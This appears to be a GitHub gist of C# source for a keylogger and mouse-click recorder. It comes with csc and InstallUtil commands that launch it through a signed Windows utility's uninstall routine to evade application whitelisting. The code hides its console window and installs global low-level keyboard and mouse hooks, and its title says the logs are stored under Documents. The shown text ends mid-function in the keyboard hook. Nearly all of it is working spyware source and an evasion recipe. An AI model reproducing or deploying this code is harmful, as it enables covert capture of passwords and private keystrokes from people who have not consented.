Created
May 8, 2017 00:27
-
-
Save nicholasmckinney/457f041e46e49aa49ff8b8d98f4e413d to your computer and use it in GitHub Desktop.
InstallUtil Keylogger/MouseClick Recorder - Stores Logs in [Documents\Klog-Logs]
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.IO; | |
using System.Diagnostics; | |
using System.Windows.Forms; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
//KeyStroke Mouse Clicks Code | |
/* | |
* https://code.google.com/p/klog-sharp/ | |
*/ | |
using System.Reflection; | |
using System.Threading; | |
using System.ComponentModel; | |
using System.Collections.Generic; | |
using System.Text; | |
using gma.System.Windows; | |
using System.Globalization; | |
using System.Drawing; | |
using System.Drawing.Imaging; | |
using System.Security.Permissions; | |
/* | |
Author: Casey Smith, @subTee | |
License: BSD 3-Clause | |
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:iukl.dll /target:library iukl.cs | |
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /U iukl.dll | |
*/ | |
static class Program | |
{ | |
/// <summary> | |
/// The main entry point for the application. | |
/// </summary> | |
[STAThread] | |
public static void Main() | |
{ | |
Application.EnableVisualStyles(); | |
Application.SetCompatibleTextRenderingDefault(false); | |
// not showing the form, just creating it | |
Klog.OptionsForm form = new Klog.OptionsForm(); | |
Application.Run(); | |
} | |
} | |
[System.ComponentModel.RunInstaller(true)] | |
public class Sample : System.Configuration.Install.Installer | |
{ | |
//The Methods can be Uninstall/Install. Install is transactional, and really unnecessary. | |
public override void Uninstall(System.Collections.IDictionary savedState) | |
{ | |
Console.WriteLine("Calling Main"); | |
// Hide | |
IntPtr handle = GetConsoleWindow(); | |
ShowWindow(handle, SW_HIDE); | |
Program.Main(); | |
} | |
[DllImport("kernel32.dll")] | |
static extern IntPtr GetConsoleWindow(); | |
[DllImport("user32.dll")] | |
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); | |
const int SW_HIDE = 0; | |
const int SW_SHOW = 5; | |
} | |
namespace gma.System.Windows | |
{ | |
/// <summary> | |
/// This class allows you to tap keyboard and mouse and / or to detect their activity even when an | |
/// application runes in background or does not have any user interface at all. This class raises | |
/// common .NET events with KeyEventArgs and MouseEventArgs so you can easily retrive any information you need. | |
/// </summary> | |
/// <remarks> | |
/// Does not capture unicode chars, only ASCII. | |
/// </remarks> | |
public class UserActivityHook | |
{ | |
#region Windows structure definitions | |
/// <summary> | |
/// The POINT structure defines the x- and y- coordinates of a point. | |
/// </summary> | |
/// <remarks> | |
/// http://msdn.microsoft.com/library/default.asp?url=/library/en-us/gdi/rectangl_0tiq.asp | |
/// </remarks> | |
[StructLayout(LayoutKind.Sequential)] | |
private class POINT | |
{ | |
/// <summary> | |
/// Specifies the x-coordinate of the point. | |
/// </summary> | |
public int x; | |
/// <summary> | |
/// Specifies the y-coordinate of the point. | |
/// </summary> | |
public int y; | |
} | |
/// <summary> | |
/// The MOUSEHOOKSTRUCT structure contains information about a mouse event passed to a WH_MOUSE hook procedure, MouseProc. | |
/// </summary> | |
/// <remarks> | |
/// http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/windowsuserinterface/windowing/hooks/hookreference/hookstructures/cwpstruct.asp | |
/// </remarks> | |
[StructLayout(LayoutKind.Sequential)] | |
private class MouseHookStruct | |
{ | |
/// <summary> | |
/// Specifies a POINT structure that contains the x- and y-coordinates of the cursor, in screen coordinates. | |
/// </summary> | |
public POINT pt; | |
/// <summary> | |
/// Handle to the window that will receive the mouse message corresponding to the mouse event. | |
/// </summary> | |
public int hwnd; | |
/// <summary> | |
/// Specifies the hit-test value. For a list of hit-test values, see the description of the WM_NCHITTEST message. | |
/// </summary> | |
public int wHitTestCode; | |
/// <summary> | |
/// Specifies extra information associated with the message. | |
/// </summary> | |
public int dwExtraInfo; | |
} | |
/// <summary> | |
/// The MSLLHOOKSTRUCT structure contains information about a low-level keyboard input event. | |
/// </summary> | |
[StructLayout(LayoutKind.Sequential)] | |
private class MouseLLHookStruct | |
{ | |
/// <summary> | |
/// Specifies a POINT structure that contains the x- and y-coordinates of the cursor, in screen coordinates. | |
/// </summary> | |
public POINT pt; | |
/// <summary> | |
/// If the message is WM_MOUSEWHEEL, the high-order word of this member is the wheel delta. | |
/// The low-order word is reserved. A positive value indicates that the wheel was rotated forward, | |
/// away from the user; a negative value indicates that the wheel was rotated backward, toward the user. | |
/// One wheel click is defined as WHEEL_DELTA, which is 120. | |
///If the message is WM_XBUTTONDOWN, WM_XBUTTONUP, WM_XBUTTONDBLCLK, WM_NCXBUTTONDOWN, WM_NCXBUTTONUP, | |
/// or WM_NCXBUTTONDBLCLK, the high-order word specifies which X button was pressed or released, | |
/// and the low-order word is reserved. This value can be one or more of the following values. Otherwise, mouseData is not used. | |
///XBUTTON1 | |
///The first X button was pressed or released. | |
///XBUTTON2 | |
///The second X button was pressed or released. | |
/// </summary> | |
public int mouseData; | |
/// <summary> | |
/// Specifies the event-injected flag. An application can use the following value to test the mouse flags. Value Purpose | |
///LLMHF_INJECTED Test the event-injected flag. | |
///0 | |
///Specifies whether the event was injected. The value is 1 if the event was injected; otherwise, it is 0. | |
///1-15 | |
///Reserved. | |
/// </summary> | |
public int flags; | |
/// <summary> | |
/// Specifies the time stamp for this message. | |
/// </summary> | |
public int time; | |
/// <summary> | |
/// Specifies extra information associated with the message. | |
/// </summary> | |
public int dwExtraInfo; | |
} | |
/// <summary> | |
/// The KBDLLHOOKSTRUCT structure contains information about a low-level keyboard input event. | |
/// </summary> | |
/// <remarks> | |
/// http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/windowsuserinterface/windowing/hooks/hookreference/hookstructures/cwpstruct.asp | |
/// </remarks> | |
[StructLayout(LayoutKind.Sequential)] | |
private class KeyboardHookStruct | |
{ | |
/// <summary> | |
/// Specifies a virtual-key code. The code must be a value in the range 1 to 254. | |
/// </summary> | |
public int vkCode; | |
/// <summary> | |
/// Specifies a hardware scan code for the key. | |
/// </summary> | |
public int scanCode; | |
/// <summary> | |
/// Specifies the extended-key flag, event-injected flag, context code, and transition-state flag. | |
/// </summary> | |
public int flags; | |
/// <summary> | |
/// Specifies the time stamp for this message. | |
/// </summary> | |
public int time; | |
/// <summary> | |
/// Specifies extra information associated with the message. | |
/// </summary> | |
public int dwExtraInfo; | |
} | |
#endregion | |
#region Windows function imports | |
/// <summary> | |
/// The SetWindowsHookEx function installs an application-defined hook procedure into a hook chain. | |
/// You would install a hook procedure to monitor the system for certain types of events. These events | |
/// are associated either with a specific thread or with all threads in the same desktop as the calling thread. | |
/// </summary> | |
/// <param name="idHook"> | |
/// [in] Specifies the type of hook procedure to be installed. This parameter can be one of the following values. | |
/// </param> | |
/// <param name="lpfn"> | |
/// [in] Pointer to the hook procedure. If the dwThreadId parameter is zero or specifies the identifier of a | |
/// thread created by a different process, the lpfn parameter must point to a hook procedure in a dynamic-link | |
/// library (DLL). Otherwise, lpfn can point to a hook procedure in the code associated with the current process. | |
/// </param> | |
/// <param name="hMod"> | |
/// [in] Handle to the DLL containing the hook procedure pointed to by the lpfn parameter. | |
/// The hMod parameter must be set to NULL if the dwThreadId parameter specifies a thread created by | |
/// the current process and if the hook procedure is within the code associated with the current process. | |
/// </param> | |
/// <param name="dwThreadId"> | |
/// [in] Specifies the identifier of the thread with which the hook procedure is to be associated. | |
/// If this parameter is zero, the hook procedure is associated with all existing threads running in the | |
/// same desktop as the calling thread. | |
/// </param> | |
/// <returns> | |
/// If the function succeeds, the return value is the handle to the hook procedure. | |
/// If the function fails, the return value is NULL. To get extended error information, call GetLastError. | |
/// </returns> | |
/// <remarks> | |
/// http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/windowsuserinterface/windowing/hooks/hookreference/hookfunctions/setwindowshookex.asp | |
/// </remarks> | |
[DllImport("user32.dll", CharSet = CharSet.Auto, | |
CallingConvention = CallingConvention.StdCall, SetLastError = true)] | |
private static extern int SetWindowsHookEx( | |
int idHook, | |
HookProc lpfn, | |
IntPtr hMod, | |
int dwThreadId); | |
/// <summary> | |
/// The UnhookWindowsHookEx function removes a hook procedure installed in a hook chain by the SetWindowsHookEx function. | |
/// </summary> | |
/// <param name="idHook"> | |
/// [in] Handle to the hook to be removed. This parameter is a hook handle obtained by a previous call to SetWindowsHookEx. | |
/// </param> | |
/// <returns> | |
/// If the function succeeds, the return value is nonzero. | |
/// If the function fails, the return value is zero. To get extended error information, call GetLastError. | |
/// </returns> | |
/// <remarks> | |
/// http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/windowsuserinterface/windowing/hooks/hookreference/hookfunctions/setwindowshookex.asp | |
/// </remarks> | |
[DllImport("user32.dll", CharSet = CharSet.Auto, | |
CallingConvention = CallingConvention.StdCall, SetLastError = true)] | |
private static extern int UnhookWindowsHookEx(int idHook); | |
/// <summary> | |
/// The CallNextHookEx function passes the hook information to the next hook procedure in the current hook chain. | |
/// A hook procedure can call this function either before or after processing the hook information. | |
/// </summary> | |
/// <param name="idHook">Ignored.</param> | |
/// <param name="nCode"> | |
/// [in] Specifies the hook code passed to the current hook procedure. | |
/// The next hook procedure uses this code to determine how to process the hook information. | |
/// </param> | |
/// <param name="wParam"> | |
/// [in] Specifies the wParam value passed to the current hook procedure. | |
/// The meaning of this parameter depends on the type of hook associated with the current hook chain. | |
/// </param> | |
/// <param name="lParam"> | |
/// [in] Specifies the lParam value passed to the current hook procedure. | |
/// The meaning of this parameter depends on the type of hook associated with the current hook chain. | |
/// </param> | |
/// <returns> | |
/// This value is returned by the next hook procedure in the chain. | |
/// The current hook procedure must also return this value. The meaning of the return value depends on the hook type. | |
/// For more information, see the descriptions of the individual hook procedures. | |
/// </returns> | |
/// <remarks> | |
/// http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/windowsuserinterface/windowing/hooks/hookreference/hookfunctions/setwindowshookex.asp | |
/// </remarks> | |
[DllImport("user32.dll", CharSet = CharSet.Auto, | |
CallingConvention = CallingConvention.StdCall)] | |
private static extern int CallNextHookEx( | |
int idHook, | |
int nCode, | |
int wParam, | |
IntPtr lParam); | |
/// <summary> | |
/// The CallWndProc hook procedure is an application-defined or library-defined callback | |
/// function used with the SetWindowsHookEx function. The HOOKPROC type defines a pointer | |
/// to this callback function. CallWndProc is a placeholder for the application-defined | |
/// or library-defined function name. | |
/// </summary> | |
/// <param name="nCode"> | |
/// [in] Specifies whether the hook procedure must process the message. | |
/// If nCode is HC_ACTION, the hook procedure must process the message. | |
/// If nCode is less than zero, the hook procedure must pass the message to the | |
/// CallNextHookEx function without further processing and must return the | |
/// value returned by CallNextHookEx. | |
/// </param> | |
/// <param name="wParam"> | |
/// [in] Specifies whether the message was sent by the current thread. | |
/// If the message was sent by the current thread, it is nonzero; otherwise, it is zero. | |
/// </param> | |
/// <param name="lParam"> | |
/// [in] Pointer to a CWPSTRUCT structure that contains details about the message. | |
/// </param> | |
/// <returns> | |
/// If nCode is less than zero, the hook procedure must return the value returned by CallNextHookEx. | |
/// If nCode is greater than or equal to zero, it is highly recommended that you call CallNextHookEx | |
/// and return the value it returns; otherwise, other applications that have installed WH_CALLWNDPROC | |
/// hooks will not receive hook notifications and may behave incorrectly as a result. If the hook | |
/// procedure does not call CallNextHookEx, the return value should be zero. | |
/// </returns> | |
/// <remarks> | |
/// http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/windowsuserinterface/windowing/hooks/hookreference/hookfunctions/callwndproc.asp | |
/// </remarks> | |
private delegate int HookProc(int nCode, int wParam, IntPtr lParam); | |
/// <summary> | |
/// The ToAscii function translates the specified virtual-key code and keyboard | |
/// state to the corresponding character or characters. The function translates the code | |
/// using the input language and physical keyboard layout identified by the keyboard layout handle. | |
/// </summary> | |
/// <param name="uVirtKey"> | |
/// [in] Specifies the virtual-key code to be translated. | |
/// </param> | |
/// <param name="uScanCode"> | |
/// [in] Specifies the hardware scan code of the key to be translated. | |
/// The high-order bit of this value is set if the key is up (not pressed). | |
/// </param> | |
/// <param name="lpbKeyState"> | |
/// [in] Pointer to a 256-byte array that contains the current keyboard state. | |
/// Each element (byte) in the array contains the state of one key. | |
/// If the high-order bit of a byte is set, the key is down (pressed). | |
/// The low bit, if set, indicates that the key is toggled on. In this function, | |
/// only the toggle bit of the CAPS LOCK key is relevant. The toggle state | |
/// of the NUM LOCK and SCROLL LOCK keys is ignored. | |
/// </param> | |
/// <param name="lpwTransKey"> | |
/// [out] Pointer to the buffer that receives the translated character or characters. | |
/// </param> | |
/// <param name="fuState"> | |
/// [in] Specifies whether a menu is active. This parameter must be 1 if a menu is active, or 0 otherwise. | |
/// </param> | |
/// <returns> | |
/// If the specified key is a dead key, the return value is negative. Otherwise, it is one of the following values. | |
/// Value Meaning | |
/// 0 The specified virtual key has no translation for the current state of the keyboard. | |
/// 1 One character was copied to the buffer. | |
/// 2 Two characters were copied to the buffer. This usually happens when a dead-key character | |
/// (accent or diacritic) stored in the keyboard layout cannot be composed with the specified | |
/// virtual key to form a single character. | |
/// </returns> | |
/// <remarks> | |
/// http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/windowsuserinterface/userinput/keyboardinput/keyboardinputreference/keyboardinputfunctions/toascii.asp | |
/// </remarks> | |
[DllImport("user32")] | |
private static extern int ToAscii( | |
int uVirtKey, | |
int uScanCode, | |
byte[] lpbKeyState, | |
byte[] lpwTransKey, | |
int fuState); | |
[DllImport("user32")] | |
public static extern int ToUnicode( | |
int wVirtKey, | |
int wScanCode, | |
byte[] lpKeyState, | |
char[] pwszBuff, | |
int cchBuff, | |
int wFlags); | |
/// <summary> | |
/// The GetKeyboardState function copies the status of the 256 virtual keys to the | |
/// specified buffer. | |
/// </summary> | |
/// <param name="pbKeyState"> | |
/// [in] Pointer to a 256-byte array that contains keyboard key states. | |
/// </param> | |
/// <returns> | |
/// If the function succeeds, the return value is nonzero. | |
/// If the function fails, the return value is zero. To get extended error information, call GetLastError. | |
/// </returns> | |
/// <remarks> | |
/// http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/windowsuserinterface/userinput/keyboardinput/keyboardinputreference/keyboardinputfunctions/toascii.asp | |
/// </remarks> | |
[DllImport("user32")] | |
private static extern int GetKeyboardState(byte[] pbKeyState); | |
[DllImport("user32.dll", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)] | |
private static extern short GetKeyState(int vKey); | |
#endregion | |
#region Windows constants | |
//values from Winuser.h in Microsoft SDK. | |
/// <summary> | |
/// Windows NT/2000/XP: Installs a hook procedure that monitors low-level mouse input events. | |
/// </summary> | |
private const int WH_MOUSE_LL = 14; | |
/// <summary> | |
/// Windows NT/2000/XP: Installs a hook procedure that monitors low-level keyboard input events. | |
/// </summary> | |
private const int WH_KEYBOARD_LL = 13; | |
/// <summary> | |
/// Installs a hook procedure that monitors mouse messages. For more information, see the MouseProc hook procedure. | |
/// </summary> | |
private const int WH_MOUSE = 7; | |
/// <summary> | |
/// Installs a hook procedure that monitors keystroke messages. For more information, see the KeyboardProc hook procedure. | |
/// </summary> | |
private const int WH_KEYBOARD = 2; | |
/// <summary> | |
/// The WM_MOUSEMOVE message is posted to a window when the cursor moves. | |
/// </summary> | |
private const int WM_MOUSEMOVE = 0x200; | |
/// <summary> | |
/// The WM_LBUTTONDOWN message is posted when the user presses the left mouse button | |
/// </summary> | |
private const int WM_LBUTTONDOWN = 0x201; | |
/// <summary> | |
/// The WM_RBUTTONDOWN message is posted when the user presses the right mouse button | |
/// </summary> | |
private const int WM_RBUTTONDOWN = 0x204; | |
/// <summary> | |
/// The WM_MBUTTONDOWN message is posted when the user presses the middle mouse button | |
/// </summary> | |
private const int WM_MBUTTONDOWN = 0x207; | |
/// <summary> | |
/// The WM_LBUTTONUP message is posted when the user releases the left mouse button | |
/// </summary> | |
private const int WM_LBUTTONUP = 0x202; | |
/// <summary> | |
/// The WM_RBUTTONUP message is posted when the user releases the right mouse button | |
/// </summary> | |
private const int WM_RBUTTONUP = 0x205; | |
/// <summary> | |
/// The WM_MBUTTONUP message is posted when the user releases the middle mouse button | |
/// </summary> | |
private const int WM_MBUTTONUP = 0x208; | |
/// <summary> | |
/// The WM_LBUTTONDBLCLK message is posted when the user double-clicks the left mouse button | |
/// </summary> | |
private const int WM_LBUTTONDBLCLK = 0x203; | |
/// <summary> | |
/// The WM_RBUTTONDBLCLK message is posted when the user double-clicks the right mouse button | |
/// </summary> | |
private const int WM_RBUTTONDBLCLK = 0x206; | |
/// <summary> | |
/// The WM_RBUTTONDOWN message is posted when the user presses the right mouse button | |
/// </summary> | |
private const int WM_MBUTTONDBLCLK = 0x209; | |
/// <summary> | |
/// The WM_MOUSEWHEEL message is posted when the user presses the mouse wheel. | |
/// </summary> | |
private const int WM_MOUSEWHEEL = 0x020A; | |
/// <summary> | |
/// The WM_KEYDOWN message is posted to the window with the keyboard focus when a nonsystem | |
/// key is pressed. A nonsystem key is a key that is pressed when the ALT key is not pressed. | |
/// </summary> | |
private const int WM_KEYDOWN = 0x100; | |
/// <summary> | |
/// The WM_KEYUP message is posted to the window with the keyboard focus when a nonsystem | |
/// key is released. A nonsystem key is a key that is pressed when the ALT key is not pressed, | |
/// or a keyboard key that is pressed when a window has the keyboard focus. | |
/// </summary> | |
private const int WM_KEYUP = 0x101; | |
/// <summary> | |
/// The WM_SYSKEYDOWN message is posted to the window with the keyboard focus when the user | |
/// presses the F10 key (which activates the menu bar) or holds down the ALT key and then | |
/// presses another key. It also occurs when no window currently has the keyboard focus; | |
/// in this case, the WM_SYSKEYDOWN message is sent to the active window. The window that | |
/// receives the message can distinguish between these two contexts by checking the context | |
/// code in the lParam parameter. | |
/// </summary> | |
private const int WM_SYSKEYDOWN = 0x104; | |
/// <summary> | |
/// The WM_SYSKEYUP message is posted to the window with the keyboard focus when the user | |
/// releases a key that was pressed while the ALT key was held down. It also occurs when no | |
/// window currently has the keyboard focus; in this case, the WM_SYSKEYUP message is sent | |
/// to the active window. The window that receives the message can distinguish between | |
/// these two contexts by checking the context code in the lParam parameter. | |
/// </summary> | |
private const int WM_SYSKEYUP = 0x105; | |
private const byte VK_SHIFT = 0x10; | |
private const byte VK_CAPITAL = 0x14; | |
private const byte VK_NUMLOCK = 0x90; | |
#endregion | |
/// <summary> | |
/// Creates an instance of UserActivityHook object and sets mouse and keyboard hooks. | |
/// </summary> | |
/// <exception cref="Win32Exception">Any windows problem.</exception> | |
public UserActivityHook() | |
{ | |
Start(); | |
} | |
/// <summary> | |
/// Creates an instance of UserActivityHook object and installs both or one of mouse and/or keyboard hooks and starts rasing events | |
/// </summary> | |
/// <param name="InstallMouseHook"><b>true</b> if mouse events must be monitored</param> | |
/// <param name="InstallKeyboardHook"><b>true</b> if keyboard events must be monitored</param> | |
/// <exception cref="Win32Exception">Any windows problem.</exception> | |
/// <remarks> | |
/// To create an instance without installing hooks call new UserActivityHook(false, false) | |
/// </remarks> | |
public UserActivityHook(bool InstallMouseHook, bool InstallKeyboardHook) | |
{ | |
Start(InstallMouseHook, InstallKeyboardHook); | |
} | |
/// <summary> | |
/// Destruction. | |
/// </summary> | |
~UserActivityHook() | |
{ | |
//uninstall hooks and do not throw exceptions | |
Stop(true, true, false); | |
} | |
/// <summary> | |
/// Occurs when the user moves the mouse, presses any mouse button or scrolls the wheel | |
/// </summary> | |
public event MouseEventHandler OnMouseActivity; | |
/// <summary> | |
/// Occurs when the user presses a key | |
/// </summary> | |
public event KeyEventHandler KeyDown; | |
/// <summary> | |
/// Occurs when the user presses and releases | |
/// </summary> | |
public event KeyPressEventHandler KeyPress; | |
/// <summary> | |
/// Occurs when the user releases a key | |
/// </summary> | |
public event KeyEventHandler KeyUp; | |
/// <summary> | |
/// Stores the handle to the mouse hook procedure. | |
/// </summary> | |
private int hMouseHook = 0; | |
/// <summary> | |
/// Stores the handle to the keyboard hook procedure. | |
/// </summary> | |
private int hKeyboardHook = 0; | |
/// <summary> | |
/// Declare MouseHookProcedure as HookProc type. | |
/// </summary> | |
private static HookProc MouseHookProcedure; | |
/// <summary> | |
/// Declare KeyboardHookProcedure as HookProc type. | |
/// </summary> | |
private static HookProc KeyboardHookProcedure; | |
/// <summary> | |
/// Installs both mouse and keyboard hooks and starts rasing events | |
/// </summary> | |
/// <exception cref="Win32Exception">Any windows problem.</exception> | |
public void Start() | |
{ | |
this.Start(true, true); | |
} | |
/// <summary> | |
/// Installs both or one of mouse and/or keyboard hooks and starts rasing events | |
/// </summary> | |
/// <param name="InstallMouseHook"><b>true</b> if mouse events must be monitored</param> | |
/// <param name="InstallKeyboardHook"><b>true</b> if keyboard events must be monitored</param> | |
/// <exception cref="Win32Exception">Any windows problem.</exception> | |
public void Start(bool InstallMouseHook, bool InstallKeyboardHook) | |
{ | |
// install Mouse hook only if it is not installed and must be installed | |
if (hMouseHook == 0 && InstallMouseHook) | |
{ | |
// Create an instance of HookProc. | |
MouseHookProcedure = new HookProc(MouseHookProc); | |
//install hook | |
hMouseHook = SetWindowsHookEx( | |
WH_MOUSE_LL, | |
MouseHookProcedure, | |
Marshal.GetHINSTANCE( | |
Assembly.GetExecutingAssembly().GetModules()[0]), | |
0); | |
//If SetWindowsHookEx fails. | |
if (hMouseHook == 0) | |
{ | |
//Returns the error code returned by the last unmanaged function called using platform invoke that has the DllImportAttribute.SetLastError flag set. | |
int errorCode = Marshal.GetLastWin32Error(); | |
//do cleanup | |
Stop(true, false, false); | |
//Initializes and throws a new instance of the Win32Exception class with the specified error. | |
throw new Win32Exception(errorCode); | |
} | |
} | |
// install Keyboard hook only if it is not installed and must be installed | |
if (hKeyboardHook == 0 && InstallKeyboardHook) | |
{ | |
// Create an instance of HookProc. | |
KeyboardHookProcedure = new HookProc(KeyboardHookProc); | |
//install hook | |
hKeyboardHook = SetWindowsHookEx( | |
WH_KEYBOARD_LL, | |
KeyboardHookProcedure, | |
Marshal.GetHINSTANCE( | |
Assembly.GetExecutingAssembly().GetModules()[0]), | |
0); | |
//If SetWindowsHookEx fails. | |
if (hKeyboardHook == 0) | |
{ | |
//Returns the error code returned by the last unmanaged function called using platform invoke that has the DllImportAttribute.SetLastError flag set. | |
int errorCode = Marshal.GetLastWin32Error(); | |
//do cleanup | |
Stop(false, true, false); | |
//Initializes and throws a new instance of the Win32Exception class with the specified error. | |
throw new Win32Exception(errorCode); | |
} | |
} | |
} | |
/// <summary> | |
/// Stops monitoring both mouse and keyboard events and rasing events. | |
/// </summary> | |
/// <exception cref="Win32Exception">Any windows problem.</exception> | |
public void Stop() | |
{ | |
this.Stop(true, true, true); | |
} | |
/// <summary> | |
/// Stops monitoring both or one of mouse and/or keyboard events and rasing events. | |
/// </summary> | |
/// <param name="UninstallMouseHook"><b>true</b> if mouse hook must be uninstalled</param> | |
/// <param name="UninstallKeyboardHook"><b>true</b> if keyboard hook must be uninstalled</param> | |
/// <param name="ThrowExceptions"><b>true</b> if exceptions which occured during uninstalling must be thrown</param> | |
/// <exception cref="Win32Exception">Any windows problem.</exception> | |
public void Stop(bool UninstallMouseHook, bool UninstallKeyboardHook, bool ThrowExceptions) | |
{ | |
//if mouse hook set and must be uninstalled | |
if (hMouseHook != 0 && UninstallMouseHook) | |
{ | |
//uninstall hook | |
int retMouse = UnhookWindowsHookEx(hMouseHook); | |
//reset invalid handle | |
hMouseHook = 0; | |
//if failed and exception must be thrown | |
if (retMouse == 0 && ThrowExceptions) | |
{ | |
//Returns the error code returned by the last unmanaged function called using platform invoke that has the DllImportAttribute.SetLastError flag set. | |
int errorCode = Marshal.GetLastWin32Error(); | |
//Initializes and throws a new instance of the Win32Exception class with the specified error. | |
throw new Win32Exception(errorCode); | |
} | |
} | |
//if keyboard hook set and must be uninstalled | |
if (hKeyboardHook != 0 && UninstallKeyboardHook) | |
{ | |
//uninstall hook | |
int retKeyboard = UnhookWindowsHookEx(hKeyboardHook); | |
//reset invalid handle | |
hKeyboardHook = 0; | |
//if failed and exception must be thrown | |
if (retKeyboard == 0 && ThrowExceptions) | |
{ | |
//Returns the error code returned by the last unmanaged function called using platform invoke that has the DllImportAttribute.SetLastError flag set. | |
int errorCode = Marshal.GetLastWin32Error(); | |
//Initializes and throws a new instance of the Win32Exception class with the specified error. | |
throw new Win32Exception(errorCode); | |
} | |
} | |
} | |
/// <summary> | |
/// A callback function which will be called every time a mouse activity detected. | |
/// </summary> | |
/// <param name="nCode"> | |
/// [in] Specifies whether the hook procedure must process the message. | |
/// If nCode is HC_ACTION, the hook procedure must process the message. | |
/// If nCode is less than zero, the hook procedure must pass the message to the | |
/// CallNextHookEx function without further processing and must return the | |
/// value returned by CallNextHookEx. | |
/// </param> | |
/// <param name="wParam"> | |
/// [in] Specifies whether the message was sent by the current thread. | |
/// If the message was sent by the current thread, it is nonzero; otherwise, it is zero. | |
/// </param> | |
/// <param name="lParam"> | |
/// [in] Pointer to a CWPSTRUCT structure that contains details about the message. | |
/// </param> | |
/// <returns> | |
/// If nCode is less than zero, the hook procedure must return the value returned by CallNextHookEx. | |
/// If nCode is greater than or equal to zero, it is highly recommended that you call CallNextHookEx | |
/// and return the value it returns; otherwise, other applications that have installed WH_CALLWNDPROC | |
/// hooks will not receive hook notifications and may behave incorrectly as a result. If the hook | |
/// procedure does not call CallNextHookEx, the return value should be zero. | |
/// </returns> | |
private int MouseHookProc(int nCode, int wParam, IntPtr lParam) | |
{ | |
// if ok and someone listens to our events | |
if ((nCode >= 0) && (OnMouseActivity != null) | |
&& wParam != WM_MOUSEMOVE) // and not just a mouse move | |
{ | |
//Marshall the data from callback. | |
MouseLLHookStruct mouseHookStruct = (MouseLLHookStruct)Marshal.PtrToStructure(lParam, typeof(MouseLLHookStruct)); | |
//detect button clicked | |
MouseButtons button = MouseButtons.None; | |
short mouseDelta = 0; | |
switch (wParam) | |
{ | |
case WM_LBUTTONDOWN: | |
//case WM_LBUTTONUP: | |
//case WM_LBUTTONDBLCLK: | |
button = MouseButtons.Left; | |
break; | |
case WM_RBUTTONDOWN: | |
//case WM_RBUTTONUP: | |
//case WM_RBUTTONDBLCLK: | |
button = MouseButtons.Right; | |
break; | |
case WM_MOUSEWHEEL: | |
//If the message is WM_MOUSEWHEEL, the high-order word of mouseData member is the wheel delta. | |
//One wheel click is defined as WHEEL_DELTA, which is 120. | |
//(value >> 16) & 0xffff; retrieves the high-order word from the given 32-bit value | |
mouseDelta = (short)((mouseHookStruct.mouseData >> 16) & 0xffff); | |
//TODO: X BUTTONS (I havent them so was unable to test) | |
//If the message is WM_XBUTTONDOWN, WM_XBUTTONUP, WM_XBUTTONDBLCLK, WM_NCXBUTTONDOWN, WM_NCXBUTTONUP, | |
//or WM_NCXBUTTONDBLCLK, the high-order word specifies which X button was pressed or released, | |
//and the low-order word is reserved. This value can be one or more of the following values. | |
//Otherwise, mouseData is not used. | |
break; | |
} | |
//double clicks | |
int clickCount = 0; | |
if (button != MouseButtons.None) | |
if (wParam == WM_LBUTTONDBLCLK || wParam == WM_RBUTTONDBLCLK) clickCount = 2; | |
else clickCount = 1; | |
//generate event | |
MouseEventArgs e = new MouseEventArgs( | |
button, | |
clickCount, | |
mouseHookStruct.pt.x, | |
mouseHookStruct.pt.y, | |
mouseDelta); | |
//raise it | |
OnMouseActivity(this, e); | |
} | |
//call next hook | |
return CallNextHookEx(hMouseHook, nCode, wParam, lParam); | |
} | |
/// <summary> | |
/// A callback function which will be called every time a keyboard activity detected. | |
/// </summary> | |
/// <param name="nCode"> | |
/// [in] Specifies whether the hook procedure must process the message. | |
/// If nCode is HC_ACTION, the hook procedure must process the message. | |
/// If nCode is less than zero, the hook procedure must pass the message to the | |
/// CallNextHookEx function without further processing and must return the | |
/// value returned by CallNextHookEx. | |
/// </param> | |
/// <param name="wParam"> | |
/// [in] Specifies whether the message was sent by the current thread. | |
/// If the message was sent by the current thread, it is nonzero; otherwise, it is zero. | |
/// </param> | |
/// <param name="lParam"> | |
/// [in] Pointer to a CWPSTRUCT structure that contains details about the message. | |
/// </param> | |
/// <returns> | |
/// If nCode is less than zero, the hook procedure must return the value returned by CallNextHookEx. | |
/// If nCode is greater than or equal to zero, it is highly recommended that you call CallNextHookEx | |
/// and return the value it returns; otherwise, other applications that have installed WH_CALLWNDPROC | |
/// hooks will not receive hook notifications and may behave incorrectly as a result. If the hook | |
/// procedure does not call CallNextHookEx, the return value should be zero. | |
/// </returns> | |
private int KeyboardHookProc(int nCode, Int32 wParam, IntPtr lParam) | |
{ | |
//indicates if any of underlaing events set e.Handled flag | |
bool handled = false; | |
//it was ok and someone listens to events | |
if ((nCode >= 0) && (KeyDown != null || KeyUp != null || KeyPress != null)) | |
{ | |
//read structure KeyboardHookStruct at lParam | |
KeyboardHookStruct MyKeyboardHookStruct = (KeyboardHookStruct)Marshal.PtrToStructure(lParam, typeof(KeyboardHookStruct)); | |
//raise KeyDown | |
if (KeyDown != null && (wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN)) | |
{ | |
Keys keyData = (Keys)MyKeyboardHookStruct.vkCode; | |
KeyEventArgs e = new KeyEventArgs(keyData); | |
KeyDown(this, e); | |
handled = handled || e.Handled; | |
} | |
// raise KeyPress | |
if (KeyPress != null && wParam == WM_KEYDOWN) | |
{ | |
bool isDownShift = ((GetKeyState(VK_SHIFT) & 0x80) == 0x80 ? true : false); | |
bool isDownCapslock = (GetKeyState(VK_CAPITAL) != 0 ? true : false); | |
byte[] keyState = new byte[256]; | |
GetKeyboardState(keyState); | |
byte[] inBuffer = new byte[2]; | |
if (ToAscii(MyKeyboardHookStruct.vkCode, | |
MyKeyboardHookStruct.scanCode, | |
keyState, | |
